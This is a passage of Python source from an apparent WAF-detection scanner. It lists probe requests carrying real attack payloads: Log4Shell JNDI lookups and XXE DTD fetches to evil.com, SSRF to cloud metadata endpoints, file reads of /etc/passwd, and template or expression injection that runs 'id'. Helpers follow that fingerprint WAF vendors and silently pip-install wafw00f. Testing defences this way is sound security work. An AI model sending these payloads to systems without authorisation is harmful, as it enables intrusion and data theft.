    {"category": "Bot / Scanner UA", "name": "UA Hydra",                  "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/4.0 (Hydra)"}},
    {"category": "Bot / Scanner UA", "name": "UA Dirbuster",              "path": "/", "params": {}, "headers": {"User-Agent": "DirBuster-1.0-RC1"}},
    {"category": "Bot / Scanner UA", "name": "UA gobuster",               "path": "/", "params": {}, "headers": {"User-Agent": "gobuster/3.1.0"}},
    {"category": "Bot / Scanner UA", "name": "UA ffuf",                   "path": "/", "params": {}, "headers": {"User-Agent": "Fuzz Faster U Fool v1.5.0"}},
    {"category": "Bot / Scanner UA", "name": "UA wfuzz",                  "path": "/", "params": {}, "headers": {"User-Agent": "wfuzz/2.4"}},
    {"category": "Bot / Scanner UA", "name": "UA Metasploit",             "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Metasploit RSPEC)"}},
    {"category": "Bot / Scanner UA", "name": "UA Havij",                  "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Havij)"}},
    {"category": "Bot / Scanner UA", "name": "UA Zgrab",                  "path": "/", "params": {}, "headers": {"User-Agent": "zgrab/0.x"}},
    {"category": "Bot / Scanner UA", "name": "UA Shodan",                 "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (compatible; shodan.io crawler)"}},
    {"category": "Bot / Scanner UA", "name": "UA censys",                 "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"}},
    {"category": "Bot / Scanner UA", "name": "UA httpx",                  "path": "/", "params": {}, "headers": {"User-Agent": "httpx/1.3.7"}},
    {"category": "Bot / Scanner UA", "name": "UA katana",                 "path": "/", "params": {}, "headers": {"User-Agent": "katana/v1.0"}},
    {"category": "Bot / Scanner UA", "name": "UA Nessus",                 "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (Nessus 10.6)"}},
    {"category": "Bot / Scanner UA", "name": "UA WPScan",                 "path": "/", "params": {}, "headers": {"User-Agent": "WPScan v3.8.24 (https://wpscan.com/wordpress-security-scanner)"}},
    {"category": "Bot / Scanner UA", "name": "UA Joomla scanner",        "path": "/", "params": {}, "headers": {"User-Agent": "Joomscan/0.0.7"}},
    {"category": "Bot / Scanner UA", "name": "UA Arachni",                "path": "/", "params": {}, "headers": {"User-Agent": "Arachni/v1.5.1"}},
    {"category": "Bot / Scanner UA", "name": "UA w3af",                   "path": "/", "params": {}, "headers": {"User-Agent": "w3af.org"}},
    {"category": "Bot / Scanner UA", "name": "UA NetCraft",               "path": "/", "params": {}, "headers": {"User-Agent": "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0)"}},
    {"category": "Bot / Scanner UA", "name": "UA no UA header",           "path": "/", "params": {}, "headers": {"User-Agent": None}},

    # ── Header Attacks (30 variants) ─────────────────────────────────────────
    {"category": "Header Attacks", "name": "XFF localhost",              "path": "/", "params": {}, "headers": {"X-Forwarded-For": "127.0.0.1"}},
    {"category": "Header Attacks", "name": "XFF internal 10.x",         "path": "/", "params": {}, "headers": {"X-Forwarded-For": "10.0.0.1"}},
    {"category": "Header Attacks", "name": "XFF chain spoof",            "path": "/", "params": {}, "headers": {"X-Forwarded-For": "127.0.0.1, 192.168.1.1"}},
    {"category": "Header Attacks", "name": "X-Real-IP spoof",            "path": "/", "params": {}, "headers": {"X-Real-IP": "127.0.0.1"}},
    {"category": "Header Attacks", "name": "X-Original-URL bypass",      "path": "/", "params": {}, "headers": {"X-Original-URL": "/admin"}},
    {"category": "Header Attacks", "name": "X-Rewrite-URL bypass",       "path": "/", "params": {}, "headers": {"X-Rewrite-URL": "/admin"}},
    {"category": "Header Attacks", "name": "X-Custom-IP-Auth",           "path": "/", "params": {}, "headers": {"X-Custom-IP-Authorization": "127.0.0.1"}},
    {"category": "Header Attacks", "name": "X-Forwarded-Host",           "path": "/", "params": {}, "headers": {"X-Forwarded-Host": "evil.com"}},
    {"category": "Header Attacks", "name": "Host header injection",      "path": "/", "params": {}, "headers": {"Host": "evil.com"}},
    {"category": "Header Attacks", "name": "X-HTTP-Method override",     "path": "/", "params": {}, "headers": {"X-HTTP-Method-Override": "DELETE"}},
    {"category": "Header Attacks", "name": "Content-Type confusion",     "path": "/", "params": {}, "headers": {"Content-Type": "application/x-www-form-urlencoded; charset=ibm037"}},
    {"category": "Header Attacks", "name": "Transfer-Encoding att",      "path": "/", "params": {}, "headers": {"Transfer-Encoding": "chunked, identity"}},
    {"category": "Header Attacks", "name": "X-Forwarded-For 0.0.0.0",   "path": "/", "params": {}, "headers": {"X-Forwarded-For": "0.0.0.0"}},
    {"category": "Header Attacks", "name": "X-Client-IP spoof",          "path": "/", "params": {}, "headers": {"X-Client-IP": "127.0.0.1"}},
    {"category": "Header Attacks", "name": "X-ProxyUser-Ip",             "path": "/", "params": {}, "headers": {"X-ProxyUser-Ip": "127.0.0.1"}},
    {"category": "Header Attacks", "name": "True-Client-IP",             "path": "/", "params": {}, "headers": {"True-Client-IP": "127.0.0.1"}},
    {"category": "Header Attacks", "name": "X-Originating-IP",           "path": "/", "params": {}, "headers": {"X-Originating-IP": "127.0.0.1"}},
    {"category": "Header Attacks", "name": "Forwarded for spoof",        "path": "/", "params": {}, "headers": {"Forwarded": "for=127.0.0.1;proto=http"}},
    {"category": "Header Attacks", "name": "X-Host override",            "path": "/", "params": {}, "headers": {"X-Host": "evil.com"}},
    {"category": "Header Attacks", "name": "X-Forwarded-Server",         "path": "/", "params": {}, "headers": {"X-Forwarded-Server": "evil.com"}},
    {"category": "Header Attacks", "name": "Cache-Control poison",       "path": "/", "params": {}, "headers": {"Cache-Control": "no-cache", "X-Forwarded-Host": "evil.com"}},
    {"category": "Header Attacks", "name": "Pragma cache poison",        "path": "/", "params": {}, "headers": {"Pragma": "no-cache", "X-Original-URL": "/admin"}},
    {"category": "Header Attacks", "name": "Accept-Language injection",  "path": "/", "params": {}, "headers": {"Accept-Language": "en-US,<script>alert(1)</script>"}},
    {"category": "Header Attacks", "name": "Accept-Encoding attack",     "path": "/", "params": {}, "headers": {"Accept-Encoding": "gzip;q=1.0, identity; q=0.5, *;q=0"}},
    {"category": "Header Attacks", "name": "X-Method-Override DELETE",   "path": "/api/users/1", "params": {}, "headers": {"X-Method-Override": "DELETE"}},
    {"category": "Header Attacks", "name": "X-Override-Method PUT",      "path": "/api/users/1", "params": {}, "headers": {"X-Override-Method": "PUT"}},
    {"category": "Header Attacks", "name": "Origin spoof",               "path": "/", "params": {}, "headers": {"Origin": "https://evil.com"}},
    {"category": "Header Attacks", "name": "Access-Control bypass",      "path": "/api/admin", "params": {}, "headers": {"Origin": "null"}},
    {"category": "Header Attacks", "name": "Max-Forwards overflow",      "path": "/", "params": {}, "headers": {"Max-Forwards": "0"}},
    {"category": "Header Attacks", "name": "Expect injection",           "path": "/", "params": {}, "headers": {"Expect": "100-continue"}},

    # ── SSRF (25 variants) ───────────────────────────────────────────────────
    {"category": "SSRF", "name": "SSRF localhost param",           "path": "/", "params": {"url": "http://127.0.0.1/"},                            "headers": {}},
    {"category": "SSRF", "name": "SSRF AWS metadata",              "path": "/", "params": {"url": "http://169.254.169.254/latest/meta-data/"},     "headers": {}},
    {"category": "SSRF", "name": "SSRF file proto",                "path": "/", "params": {"url": "file:///etc/passwd"},                          "headers": {}},
    {"category": "SSRF", "name": "SSRF internal 192.168",          "path": "/", "params": {"redirect": "http://192.168.1.1/admin"},               "headers": {}},
    {"category": "SSRF", "name": "SSRF GCP metadata",              "path": "/", "params": {"url": "http://metadata.google.internal/"},            "headers": {}},
    {"category": "SSRF", "name": "SSRF via Referer",               "path": "/", "params": {},                                                     "headers": {"Referer": "http://169.254.169.254/"}},
    {"category": "SSRF", "name": "SSRF 0.0.0.0",                   "path": "/", "params": {"url": "http://0.0.0.0/admin"},                        "headers": {}},
    {"category": "SSRF", "name": "SSRF decimal IP",                "path": "/", "params": {"url": "http://2130706433/"},                          "headers": {}},
    {"category": "SSRF", "name": "SSRF hex IP",                    "path": "/", "params": {"url": "http://0x7f000001/"},                          "headers": {}},
    {"category": "SSRF", "name": "SSRF octal IP",                  "path": "/", "params": {"url": "http://0177.0.0.1/"},                          "headers": {}},
    {"category": "SSRF", "name": "SSRF Azure metadata",            "path": "/", "params": {"url": "http://169.254.169.254/metadata/instance"},    "headers": {}},
    {"category": "SSRF", "name": "SSRF DigitalOcean metadata",     "path": "/", "params": {"url": "http://169.254.169.254/metadata/v1/"},         "headers": {}},
    {"category": "SSRF", "name": "SSRF localhost 0",               "path": "/", "params": {"url": "http://0/"},                                   "headers": {}},
    {"category": "SSRF", "name": "SSRF IPv6 localhost",            "path": "/", "params": {"url": "http://[::1]/"},                               "headers": {}},
    {"category": "SSRF", "name": "SSRF in fetch param",            "path": "/", "params": {"fetch": "http://127.0.0.1:22/"},                      "headers": {}},
    {"category": "SSRF", "name": "SSRF in src param",              "path": "/", "params": {"src": "http://169.254.169.254/"},                     "headers": {}},
    {"category": "SSRF", "name": "SSRF in webhook",                "path": "/api/webhook", "params": {"url": "http://127.0.0.1:6379/"},           "headers": {}},
    {"category": "SSRF", "name": "SSRF in import",                 "path": "/", "params": {"import": "http://169.254.169.254/"},                  "headers": {}},
    {"category": "SSRF", "name": "SSRF bypass with @",             "path": "/", "params": {"url": "http://evil.com@127.0.0.1/"},                  "headers": {}},
    {"category": "SSRF", "name": "SSRF bypass with #",             "path": "/", "params": {"url": "http://127.0.0.1#@evil.com/"},                 "headers": {}},
    {"category": "SSRF", "name": "SSRF dict proto",                "path": "/", "params": {"url": "dict://127.0.0.1:11211/"},                     "headers": {}},
    {"category": "SSRF", "name": "SSRF gopher proto",              "path": "/", "params": {"url": "gopher://127.0.0.1:6379/_PING%0D%0A"},         "headers": {}},
    {"category": "SSRF", "name": "SSRF in X-Forwarded-For",        "path": "/", "params": {},                                                     "headers": {"X-Forwarded-For": "169.254.169.254"}},
    {"category": "SSRF", "name": "SSRF localhost 127.1",           "path": "/", "params": {"url": "http://127.1/"},                               "headers": {}},
    {"category": "SSRF", "name": "SSRF internal DNS",              "path": "/", "params": {"url": "http://localhost.evil.com/"},                  "headers": {}},

    # ── Log4Shell (15 variants) ───────────────────────────────────────────────
    {"category": "Log4Shell", "name": "Log4j JNDI ldap UA",        "path": "/", "params": {}, "headers": {"User-Agent": "${jndi:ldap://evil.com/a}"}},
    {"category": "Log4Shell", "name": "Log4j JNDI rmi UA",         "path": "/", "params": {}, "headers": {"User-Agent": "${jndi:rmi://evil.com/a}"}},
    {"category": "Log4Shell", "name": "Log4j JNDI in param",       "path": "/", "params": {"q": "${jndi:ldap://evil.com/a}"},                     "headers": {}},
    {"category": "Log4Shell", "name": "Log4j nested evasion",      "path": "/", "params": {}, "headers": {"User-Agent": "${${lower:j}ndi:${lower:l}dap://evil.com/a}"}},
    {"category": "Log4Shell", "name": "Log4j in X-Api-Version",    "path": "/", "params": {}, "headers": {"X-Api-Version": "${jndi:ldap://evil.com/a}"}},
    {"category": "Log4Shell", "name": "Log4j URL encoded",         "path": "/", "params": {}, "headers": {"User-Agent": "%24%7Bjndi%3Aldap%3A%2F%2Fevil.com%2Fa%7D"}},
    {"category": "Log4Shell", "name": "Log4j in Authorization",    "path": "/", "params": {}, "headers": {"Authorization": "Bearer ${jndi:ldap://evil.com/a}"}},
    {"category": "Log4Shell", "name": "Log4j in Cookie",           "path": "/", "params": {}, "headers": {"Cookie": "session=${jndi:ldap://evil.com/a}"}},
    {"category": "Log4Shell", "name": "Log4j in X-Forwarded-For",  "path": "/", "params": {}, "headers": {"X-Forwarded-For": "${jndi:ldap://evil.com/a}"}},
    {"category": "Log4Shell", "name": "Log4j in Referer",          "path": "/", "params": {}, "headers": {"Referer": "${jndi:ldap://evil.com/a}"}},
    {"category": "Log4Shell", "name": "Log4j upper evasion",       "path": "/", "params": {}, "headers": {"User-Agent": "${${upper:j}ndi:ldap://evil.com/a}"}},
    {"category": "Log4Shell", "name": "Log4j double nested",       "path": "/", "params": {}, "headers": {"User-Agent": "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://evil.com/a}"}},
    {"category": "Log4Shell", "name": "Log4j JNDI dns",            "path": "/", "params": {}, "headers": {"User-Agent": "${jndi:dns://evil.com/a}"}},
    {"category": "Log4Shell", "name": "Log4j in Accept header",    "path": "/", "params": {}, "headers": {"Accept": "${jndi:ldap://evil.com/a}"}},
    {"category": "Log4Shell", "name": "Log4j in Content-Type",     "path": "/", "params": {}, "headers": {"Content-Type": "${jndi:ldap://evil.com/a}"}},

    # ── XXE — XML External Entity (15 variants) ───────────────────────────────
    {"category": "XXE", "name": "XXE classic file read",           "path": "/api/xml", "params": {},  "headers": {"Content-Type": "application/xml"}},
    {"category": "XXE", "name": "XXE SYSTEM /etc/passwd",          "path": "/", "params": {"xml": "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>"}, "headers": {}},
    {"category": "XXE", "name": "XXE SYSTEM win hosts",            "path": "/", "params": {"xml": "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///c:/windows/system32/drivers/etc/hosts\">]><foo>&xxe;</foo>"}, "headers": {}},
    {"category": "XXE", "name": "XXE billion laughs DoS",          "path": "/", "params": {"xml": "<?xml version=\"1.0\"?><!DOCTYPE lolz [<!ENTITY lol \"lol\"><!ENTITY lol2 \"&lol;&lol;\"><!ENTITY lol3 \"&lol2;&lol2;\">]><lolz>&lol3;</lolz>"}, "headers": {}},
    {"category": "XXE", "name": "XXE SSRF HTTP",                   "path": "/", "params": {"xml": "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://169.254.169.254/\">]><foo>&xxe;</foo>"}, "headers": {}},
    {"category": "XXE", "name": "XXE blind OOB",                   "path": "/", "params": {"xml": "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://evil.com/evil.dtd\"> %xxe;]><foo/>"},  "headers": {}},
    {"category": "XXE", "name": "XXE in SOAP",                     "path": "/ws", "params": {}, "headers": {"Content-Type": "text/xml", "SOAPAction": "test"}},
    {"category": "XXE", "name": "XXE in SVG upload",               "path": "/upload", "params": {}, "headers": {"Content-Type": "image/svg+xml"}},
    {"category": "XXE", "name": "XXE PHP expect",                  "path": "/", "params": {"xml": "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"expect://id\">]><foo>&xxe;</foo>"}, "headers": {}},
    {"category": "XXE", "name": "XXE UTF-16 encoding",             "path": "/", "params": {"data": "<?xml version=\"1.0\" encoding=\"UTF-16\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>"}, "headers": {}},
    {"category": "XXE", "name": "XXE in Content-Type header",      "path": "/api/data", "params": {}, "headers": {"Content-Type": "application/xml; charset=utf-8"}},
    {"category": "XXE", "name": "XXE via JSON endpoint",           "path": "/api/json", "params": {"__xml": "<!DOCTYPE foo [<!ENTITY x SYSTEM \"file:///etc/passwd\">]>"}, "headers": {}},
    {"category": "XXE", "name": "XXE in RSS feed",                 "path": "/rss", "params": {}, "headers": {"Accept": "application/rss+xml"}},
    {"category": "XXE", "name": "XXE entity in DOCTYPE",           "path": "/", "params": {"q": "<!DOCTYPE test [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]>&xxe;"}, "headers": {}},
    {"category": "XXE", "name": "XXE via file parameter",          "path": "/", "params": {"file": "<!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><foo>&xxe;</foo>"}, "headers": {}},

    # ── SSTI — Server-Side Template Injection (15 variants) ──────────────────
    {"category": "SSTI", "name": "SSTI Jinja2 basic",              "path": "/", "params": {"q": "{{7*7}}"},                                      "headers": {}},
    {"category": "SSTI", "name": "SSTI Jinja2 RCE",                "path": "/", "params": {"q": "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}"},  "headers": {}},
    {"category": "SSTI", "name": "SSTI Jinja2 class dump",         "path": "/", "params": {"q": "{{''.__class__.mro()[1].__subclasses__()}}"},    "headers": {}},
    {"category": "SSTI", "name": "SSTI Twig {{7*'7'}}",            "path": "/", "params": {"q": "{{7*'7'}}"},                                    "headers": {}},
    {"category": "SSTI", "name": "SSTI Twig RCE",                  "path": "/", "params": {"q": "{{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}"}, "headers": {}},
    {"category": "SSTI", "name": "SSTI Freemarker",                "path": "/", "params": {"q": "${7*7}"},                                        "headers": {}},
    {"category": "SSTI", "name": "SSTI Freemarker RCE",            "path": "/", "params": {"q": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"id\")}"},  "headers": {}},
    {"category": "SSTI", "name": "SSTI Velocity",                  "path": "/", "params": {"q": "#set($x=7*7)${x}"},                             "headers": {}},
    {"category": "SSTI", "name": "SSTI Smarty",                    "path": "/", "params": {"q": "{php}echo `id`;{/php}"},                        "headers": {}},
    {"category": "SSTI", "name": "SSTI Pebble",                    "path": "/", "params": {"q": "{{7*7}}{{\"freemarker.template.utility.Execute\"?new()(\"id\")}}"},  "headers": {}},
    {"category": "SSTI", "name": "SSTI ERB Ruby",                  "path": "/", "params": {"q": "<%=7*7%>"},                                    "headers": {}},
    {"category": "SSTI", "name": "SSTI ERB RCE",                   "path": "/", "params": {"q": "<%=`id`%>"},                                   "headers": {}},
    {"category": "SSTI", "name": "SSTI Mako",                      "path": "/", "params": {"q": "${__import__('os').popen('id').read()}"},        "headers": {}},
    {"category": "SSTI", "name": "SSTI in search",                 "path": "/search", "params": {"q": "{{7*7}}"},                                "headers": {}},
    {"category": "SSTI", "name": "SSTI in name param",             "path": "/", "params": {"name": "${7*7}"},                                    "headers": {}},

    # ── NoSQL Injection (12 variants) ─────────────────────────────────────────
    {"category": "NoSQL Injection", "name": "NoSQLi MongoDB OR",         "path": "/", "params": {"user[$ne]": "x"},                              "headers": {}},
    {"category": "NoSQL Injection", "name": "NoSQLi MongoDB regex",      "path": "/", "params": {"user[$regex]": ".*"},                          "headers": {}},
    {"category": "NoSQL Injection", "name": "NoSQLi MongoDB gt",         "path": "/", "params": {"age[$gt]": "0"},                               "headers": {}},
    {"category": "NoSQL Injection", "name": "NoSQLi login bypass",       "path": "/login", "params": {"username[$ne]": "x", "password[$ne]": "x"}, "headers": {}},
    {"category": "NoSQL Injection", "name": "NoSQLi where clause",       "path": "/", "params": {"$where": "sleep(5000)"},                       "headers": {}},
    {"category": "NoSQL Injection", "name": "NoSQLi in JSON body hint",  "path": "/api/login", "params": {"username": "{\"$gt\": \"\"}", "password": "{\"$gt\": \"\"}"},  "headers": {}},
    {"category": "NoSQL Injection", "name": "NoSQLi array injection",    "path": "/", "params": {"id[]": "2"},                                   "headers": {}},
    {"category": "NoSQL Injection", "name": "NoSQLi $in operator",       "path": "/", "params": {"status[$in][]": "admin"},                      "headers": {}},
    {"category": "NoSQL Injection", "name": "NoSQLi $or operator",       "path": "/", "params": {"$or[0][user]": "admin", "$or[0][pass][$ne]": "x"}, "headers": {}},
    {"category": "NoSQL Injection", "name": "NoSQLi CouchDB query",      "path": "/_all_docs", "params": {},                                     "headers": {}},
    {"category": "NoSQL Injection", "name": "NoSQLi Redis info probe",   "path": "/", "params": {"q": "INFO"},                                   "headers": {}},
    {"category": "NoSQL Injection", "name": "NoSQLi type confusion",     "path": "/", "params": {"id": "{}"},                                    "headers": {}},

    # ── RCE / Deserialization (15 variants) ───────────────────────────────────
    {"category": "RCE / Deserialization", "name": "Java deser ysoserial hint", "path": "/", "params": {"data": "rO0ABXNy"},                      "headers": {}},
    {"category": "RCE / Deserialization", "name": "PHP object injection",      "path": "/", "params": {"obj": "O:8:\"stdClass\":1:{s:4:\"test\";s:4:\"test\";}"},   "headers": {}},
    {"category": "RCE / Deserialization", "name": "Python pickle hint",        "path": "/", "params": {"data": "gASVAAAAAAAAAACMCGJ1aWx0aW5zlA=="},                 "headers": {}},
    {"category": "RCE / Deserialization", "name": "Java Commons Collection",   "path": "/", "params": {"payload": "aced0005"},                   "headers": {}},
    {"category": "RCE / Deserialization", "name": "PHP phar deserialization",  "path": "/", "params": {"file": "phar:///var/www/html/upload/evil.phar/test"},        "headers": {}},
    {"category": "RCE / Deserialization", "name": "Expression Language RCE",  "path": "/", "params": {"q": "${Runtime.getRuntime().exec('id')}"},  "headers": {}},
    {"category": "RCE / Deserialization", "name": "SpEL injection",            "path": "/", "params": {"expr": "T(java.lang.Runtime).getRuntime().exec('id')"},     "headers": {}},
    {"category": "RCE / Deserialization", "name": "Groovy injection",          "path": "/", "params": {"q": "def cmd='id'.execute();cmd.text"},   "headers": {}},
    {"category": "RCE / Deserialization", "name": "OGNL injection",            "path": "/", "params": {"action": "%25{(new java.lang.ProcessBuilder('id')).start()}"},  "headers": {}},
    {"category": "RCE / Deserialization", "name": "Ruby Marshal hint",         "path": "/", "params": {"data": "\x04\x08"},                       "headers": {}},
    {"category": "RCE / Deserialization", "name": "Node.js eval injection",    "path": "/", "params": {"q": "require('child_process').exec('id')"},  "headers": {}},
    {"category": "RCE / Deserialization", "name": "PHP eval via include",      "path": "/", "params": {"page": "php://input"},                    "headers": {}},
    {"category": "RCE / Deserialization", "name": "PHP assert injection",      "path": "/", "params": {"q": "system('id')"},                      "headers": {}},
    {"category": "RCE / Deserialization", "name": "Struts2 OGNL classic",      "path": "/%25%7B7*7%7D.action", "params": {},                      "headers": {}},
    {"category": "RCE / Deserialization", "name": "Spring4Shell",              "path": "/", "params": {"class.module.classLoader.resources.context.parent.pipeline.first.pattern": "%25{7*7}i"}, "headers": {}},

    # ── Open Redirect (10 variants) ───────────────────────────────────────────
    {"category": "Open Redirect", "name": "Redirect to evil.com",        "path": "/", "params": {"redirect": "https://evil.com"},                 "headers": {}},
    {"category": "Open Redirect", "name": "Redirect URL param",          "path": "/", "params": {"url": "https://evil.com"},                      "headers": {}},
    {"category": "Open Redirect", "name": "Redirect next param",         "path": "/login", "params": {"next": "https://evil.com"},                "headers": {}},
    {"category": "Open Redirect", "name": "Redirect return param",       "path": "/", "params": {"return": "https://evil.com"},                   "headers": {}},
    {"category": "Open Redirect", "name": "Redirect protocol-relative",  "path": "/", "params": {"redirect": "//evil.com"},                       "headers": {}},
    {"category": "Open Redirect", "name": "Redirect javascript URI",     "path": "/", "params": {"to": "javascript:alert(1)"},                    "headers": {}},
    {"category": "Open Redirect", "name": "Redirect data URI",           "path": "/", "params": {"url": "data:text/html,<script>alert(1)</script>"}, "headers": {}},
    {"category": "Open Redirect", "name": "Redirect backslash bypass",   "path": "/", "params": {"redirect": "https:\\\\evil.com"},               "headers": {}},
    {"category": "Open Redirect", "name": "Redirect with @",             "path": "/", "params": {"url": "https://legit.com@evil.com"},            "headers": {}},
    {"category": "Open Redirect", "name": "Redirect triple slash",       "path": "/", "params": {"return": "///evil.com"},                        "headers": {}},

    # ── CRLF Injection (10 variants) ─────────────────────────────────────────
    {"category": "CRLF Injection", "name": "CRLF in redirect",           "path": "/", "params": {"q": "test%0d%0aSet-Cookie:injected=1"},         "headers": {}},
    {"category": "CRLF Injection", "name": "CRLF header inject",         "path": "/", "params": {"q": "test%0d%0aContent-Type:text/html"},         "headers": {}},
    {"category": "CRLF Injection", "name": "CRLF in User-Agent",         "path": "/", "params": {},                                               "headers": {"User-Agent": "test\r\nSet-Cookie:injected=1"}},
    {"category": "CRLF Injection", "name": "CRLF %0a only",              "path": "/", "params": {"q": "test%0aX-Injected-Header:value"},           "headers": {}},
    {"category": "CRLF Injection", "name": "CRLF response splitting",    "path": "/", "params": {"q": "test%0d%0a%0d%0a<script>alert(1)</script>"}, "headers": {}},
    {"category": "CRLF Injection", "name": "CRLF in path",               "path": "/test%0d%0aSet-Cookie:crlfinjected=1", "params": {},             "headers": {}},
    {"category": "CRLF Injection", "name": "CRLF Unicode CR+LF",         "path": "/", "params": {"q": "test\r\nX-Inject:1"},                      "headers": {}},
    {"category": "CRLF Injection", "name": "CRLF log injection",         "path": "/", "params": {"user": "admin\r\nPassword: injected"},           "headers": {}},
    {"category": "CRLF Injection", "name": "CRLF in Referer",            "path": "/", "params": {},                                               "headers": {"Referer": "https://evil.com%0d%0aX-Injected:1"}},
    {"category": "CRLF Injection", "name": "CRLF double encode",         "path": "/", "params": {"q": "test%250d%250aX-Inject:1"},                 "headers": {}},

    # ── HTTP Request Smuggling (8 variants) ───────────────────────────────────
    {"category": "HTTP Smuggling", "name": "Smuggling CL.TE hint",       "path": "/", "params": {}, "headers": {"Transfer-Encoding": "chunked", "Content-Length": "4"}},
    {"category": "HTTP Smuggling", "name": "Smuggling TE.CL hint",       "path": "/", "params": {}, "headers": {"Transfer-Encoding": "chunked, identity"}},
    {"category": "HTTP Smuggling", "name": "Smuggling obfuscated TE",    "path": "/", "params": {}, "headers": {"Transfer-Encoding": "xchunked"}},
    {"category": "HTTP Smuggling", "name": "Smuggling TE space",         "path": "/", "params": {}, "headers": {"Transfer-Encoding": " chunked"}},
    {"category": "HTTP Smuggling", "name": "Smuggling TE tab",           "path": "/", "params": {}, "headers": {"Transfer-Encoding": "\tchunked"}},
    {"category": "HTTP Smuggling", "name": "Smuggling TE CR before",     "path": "/", "params": {}, "headers": {"Transfer-Encoding\r\n": "chunked"}},
    {"category": "HTTP Smuggling", "name": "Smuggling dual CL",          "path": "/", "params": {}, "headers": {"Content-Length": "0", "Transfer-Encoding": "chunked"}},
    {"category": "HTTP Smuggling", "name": "Smuggling invalid CL",       "path": "/", "params": {}, "headers": {"Content-Length": "99999999999"}},

    # ── GraphQL Abuse (8 variants) ────────────────────────────────────────────
    {"category": "GraphQL Abuse", "name": "GraphQL introspection",       "path": "/graphql", "params": {"query": "{__schema{types{name}}}"},       "headers": {}},
    {"category": "GraphQL Abuse", "name": "GraphQL full introspection",  "path": "/graphql", "params": {"query": "fragment+FullType+on+__Type{kind+name}+query+IntrospectionQuery{__schema{queryType{name}mutationType{name}subscriptionType{name}types{...FullType}}}"},  "headers": {}},
    {"category": "GraphQL Abuse", "name": "GraphQL mutation",            "path": "/graphql", "params": {"query": "mutation{createUser(username:\"admin\",password:\"admin\")}"},  "headers": {}},
    {"category": "GraphQL Abuse", "name": "GraphQL batch query",         "path": "/graphql", "params": {"query": "[{\"query\":\"{users{id email}}\"},{\"query\":\"{products{id price}}\"}]"}, "headers": {}},
    {"category": "GraphQL Abuse", "name": "GraphQL deep recursion",      "path": "/graphql", "params": {"query": "{users{posts{comments{user{posts{comments{user{id}}}}}}}}}"},  "headers": {}},
    {"category": "GraphQL Abuse", "name": "GraphQL alias override",      "path": "/graphql", "params": {"query": "{a:users{id}b:users{email}c:users{password}}"},                "headers": {}},
    {"category": "GraphQL Abuse", "name": "GraphQL at /api/graphql",     "path": "/api/graphql", "params": {"query": "{__schema{types{name}}}"},    "headers": {}},
    {"category": "GraphQL Abuse", "name": "GraphQL field suggest",       "path": "/graphql", "params": {"query": "{__type(name:\"User\"){fields{name type{name}}}}"},             "headers": {}},

]

_PROBE_WORKERS = 50  # parallel threads for probe requests


# ─── Detection helpers ────────────────────────────────────────────────────────

def _detect_waf(responses: list[dict]) -> tuple[str, str]:
    all_headers: dict[str, str] = {}
    all_bodies: str = ""
    all_cookies: str = ""

    for r in responses:
        all_headers.update({k.lower(): v.lower() for k, v in r.get("headers", {}).items()})
        all_bodies += r.get("body", "").lower()
        # Extract Set-Cookie values for cookie-based detection
        for k, v in r.get("headers", {}).items():
            if k.lower() in ("set-cookie", "cookie"):
                all_cookies += v.lower() + " "

    for vendor, sigs in WAF_SIGNATURES.items():
        for h in sigs["headers"]:
            if h.lower() in all_headers:
                return vendor, f"header:{h}"
        for kw in sigs["body_kw"]:
            if kw in all_bodies:
                return vendor, f"body:{kw}"
        server_val = all_headers.get("server", "")
        for s in sigs["server"]:
            if s in server_val:
                return vendor, f"server:{s}"
        for ck in sigs.get("cookies", []):
            if ck.lower() in all_cookies:
                return vendor, f"cookie:{ck}"

    blocked = any(r.get("status") in BLOCK_CODES for r in responses)
    if blocked:
        return "Unknown WAF", "blocked-probe"
    return "None detected", ""


def _detect_cdn(headers: dict) -> str:
    lower = {k.lower(): v for k, v in headers.items()}
    server = lower.get("server", "")
    if "nginx" in server and "cloudflare" not in server:
        pass  # Nginx alone is not a CDN
    for cdn, sig_headers in CDN_SIGNATURES.items():
        for sh in sig_headers:
            if sh.lower() in lower:
                return cdn
    return "None detected"


def _detect_blocking_mode(responses: list[dict]) -> str:
    for r in responses:
        if r.get("status") in BLOCK_CODES:
            return "ACTIVE"
    return "PASSIVE (detection-only)"


def _run_wafw00f(target_url: str, timeout: int = 45,
                 logger: Optional[logging.Logger] = None) -> dict:
    """
    Run wafw00f for authoritative WAF identification.
    Auto-installs via pip if not found.
    """
    import re as _re
    import subprocess as _sub
    import sys as _sys

    result: dict = {"waf_names": [], "detected": False, "raw": "", "error": None}

    wafw00f_path = shutil.which("wafw00f")
    if not wafw00f_path:
        log("[wafw00f] not found — installing via pip...", "info", logger)
        _sub.run(
            [_sys.executable, "-m", "pip", "install", "wafw00f", "--quiet"],
            capture_output=True, text=True, timeout=90,
        )
        wafw00f_path = shutil.which("wafw00f")

    if not wafw00f_path:
        result["error"] = "wafw00f install failed"
        return result

    try:
        proc = _sub.run(
            [wafw00f_path, target_url],
            capture_output=True, text=True, timeout=timeout,
        )
        output = (proc.stdout or "") + (proc.stderr or "")

        # Strip ANSI escape codes — wafw00f colours its output
